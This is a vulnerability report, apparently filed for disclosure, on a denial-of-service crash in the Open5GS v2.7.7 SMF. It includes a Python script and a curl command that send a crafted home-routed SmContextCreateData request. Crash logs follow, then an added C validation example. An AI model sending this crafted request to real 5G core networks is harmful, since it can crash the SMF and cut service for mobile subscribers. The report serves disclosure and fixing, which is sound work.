Submit #808486: Open5gs SMF v2.7.7 Denial of Service

Title: Open5gs SMF v2.7.7 Denial of Service

Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Steps to reproduce

### Description

SMF crashes when a `SmContextCreateData` request includes `hSmfUri` and thus drives the session into the home-routed V-SMF path, but the supplied `dnn` is not a full DNN.

In `smf_nsmf_handle_create_sm_context()`, a non-full `dnn` is accepted and stored as:

```c
sess->session.name = ogs_strdup(SmContextCreateData->dnn);
sess->full_dnn = NULL;
```

Later, after PFCP establishment, the HR V-SMF flow unconditionally builds `PduSessionCreateData` for the H-SMF and asserts that `sess->full_dnn` is present:

```c
PduSessionCreateData.dnn = ogs_strdup(sess->full_dnn);
ogs_assert(PduSessionCreateData.dnn);
```

So the route accepts a short DNN during session creation but fatally aborts when it later tries to forward the HR request toward the H-SMF.

This issue is distinct from the previously confirmed `missing vcnTunnelInfo` and `vsmf-pdu-session` crashes. It affects the initial `sm-contexts` create path under HR semantics.

### Steps to reproduce

1. Start the Open5GS Docker lab.

2. Prepare a `SmContextCreateData` multipart request that includes:
   - a valid `hSmfUri`, so the SMF enters HR V-SMF mode
   - a short `dnn` such as `internet`
   - a minimal `n1SmMsg` payload in the format accepted by this handler

```bash
python3 - <<'PY'
from pathlib import Path
import json

boundary = 'REQBOUNDARY'
body = {
    'supi': 'imsi-001011234567898',
    'pduSessionId': 7,
    'dnn': 'internet',
    'sNssai': {'sst': 1},
    'servingNfId': 'fake-amf',
    'guami': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'amfId': '000040'},
    'servingNetwork': {'mcc': '001', 'mnc': '01'},
    'n1SmMsg': {'contentId': '5gnas-sm'},
    'anType': '3GPP_ACCESS',
    'ratType': 'NR',
    'ueLocation': {'nrLocation': {
        'tai': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'tac': '000001'},
        'ncgi': {'plmnId': {'mcc': '001', 'mnc': '01'}, 'nrCellId': '000000001'},
        'ueLocationTimestamp': '2026-04-11T05:41:55Z'
    }},
    'smContextStatusUri': 'http://10.33.33.1:18081/namf-callback/v1/imsi-001011234567898/sm-context-status/7',
    'hSmfUri': 'http://10.33.33.1:18080/nsmf-pdusession/v1/pdu-sessions'
}

# Minimal GSM-UE establishment request payload accepted by the HR path:
n1 = bytes.fromhex('c191a1')

parts = []
parts.append(
    (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode())
    + json.dumps(body, separators=(',', ':')).encode()
    + b'\r\n'
)
parts.append(
    (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n'
     f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode())
    + n1
    + b'\r\n'
)
parts.append(f'--{boundary}--\r\n'.encode())

Path('/tmp/smctx_create_hr.multipart').write_bytes(b''.join(parts))
PY
```

3. Send the request:

```bash
curl --http2-prior-knowledge -m 10 -sS -i \
  -X POST http://10.33.33.10/nsmf-pdusession/v1/sm-contexts \
  -H 'Content-Type: multipart/related; boundary=REQBOUNDARY' \
  --data-binary @/tmp/smctx_create_hr.multipart
```

4. Check SMF state and logs:

```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-11T05:41:55Z smf
```

### Logs

```shell
HTTP/2 201
location: http://smf.open5gs.org/nsmf-pdusession/v1/sm-contexts/3

{}
exited 139 2026-04-11T05:42:13.980390637Z
04/11 05:42:13.320: [smf] INFO: [imsi-001011234567898:7] SMContextCreate HR Roaming in V-SMF (../src/smf/gsm-sm.c:299)
04/11 05:42:13.346: [core] ERROR: ogs_talloc_strdup: Expectation `ptr' failed. (../lib/core/ogs-strings.c:157)
04/11 05:42:13.346: [smf] FATAL: smf_nsmf_pdusession_build_create_data: Assertion `PduSessionCreateData.dnn' failed. (../src/smf/nsmf-build.c:105)
```

### Expected behaviour

SMF should reject HR session creation that lacks a full DNN with a normal HTTP error response.

### Observed Behaviour

SMF first returns `201 Created` for the `sm-contexts` request, then aborts asynchronously while preparing the H-SMF create request, exiting with code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
Source: https://github.com/open5gs/open5gs/issues/4450
User: FrankLin (UID 97501)
Submission: 20.04.2026 21:21 (1 month ago)
Moderation: 10.05.2026 17:44 (20 days later)
Status: Accepted
VulDB entry: 362566 [Open5GS up to 2.7.7 SMF smf_nsmf_handle_create_sm_context Denial of Service]
Points: 20
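
The expected behaviour stated in the report (reject a home-routed create request that lacks a full DNN before any session state exists) can be modelled as an up-front check; the following is an added example, not Open5GS code and not the project's fix. It assumes a "full DNN" is a Network Identifier followed by an Operator Identifier of the form `mnc<MNC>.mcc<MCC>.gprs` with three-digit codes, and that the error status is 400; `struct create_req`, `dnn_is_full` and `check_create` are hypothetical names.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Hypothetical model of the two request fields involved. */
struct create_req {
    const char *dnn;       /* SmContextCreateData.dnn */
    const char *h_smf_uri; /* SmContextCreateData.hSmfUri, NULL if absent */
};

/* Consume "<prefix><3 digits>" at *p (e.g. "mnc001") and advance *p. */
static int eat_label(const char **p, const char *prefix)
{
    size_t n = strlen(prefix), digits = 0;
    if (strncasecmp(*p, prefix, n) != 0) return 0;
    for (*p += n; isdigit((unsigned char)**p); (*p)++) digits++;
    return digits == 3;
}

/* 1 if dnn is "<NI>.mnc<MNC>.mcc<MCC>.gprs" with a non-empty NI. */
int dnn_is_full(const char *dnn)
{
    const char *dot;
    if (!dnn) return 0;
    for (dot = strchr(dnn, '.'); dot; dot = strchr(dot + 1, '.')) {
        const char *q = dot + 1;
        if (dot == dnn) continue;              /* empty Network Identifier */
        if (!eat_label(&q, "mnc") || *q != '.') continue;
        q++;
        if (eat_label(&q, "mcc") && strcasecmp(q, ".gprs") == 0) return 1;
    }
    return 0;
}

/* HTTP status to return before a session is created (400 is an assumption). */
int check_create(const struct create_req *r)
{
    if (!r || !r->dnn || !*r->dnn) return 400;
    if (r->h_smf_uri && !dnn_is_full(r->dnn)) return 400; /* HR needs full DNN */
    return 201;
}

int main(void)
{
    /* Constructed sample requests; h-smf.example is a placeholder host. */
    struct create_req hr_short = { "internet", "http://h-smf.example/pdu-sessions" };
    struct create_req hr_full = { "internet.mnc001.mcc001.gprs", hr_short.h_smf_uri };
    printf("HR short DNN -> %d\n", check_create(&hr_short));
    printf("HR full DNN  -> %d\n", check_create(&hr_full));
    return 0;
}
```
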
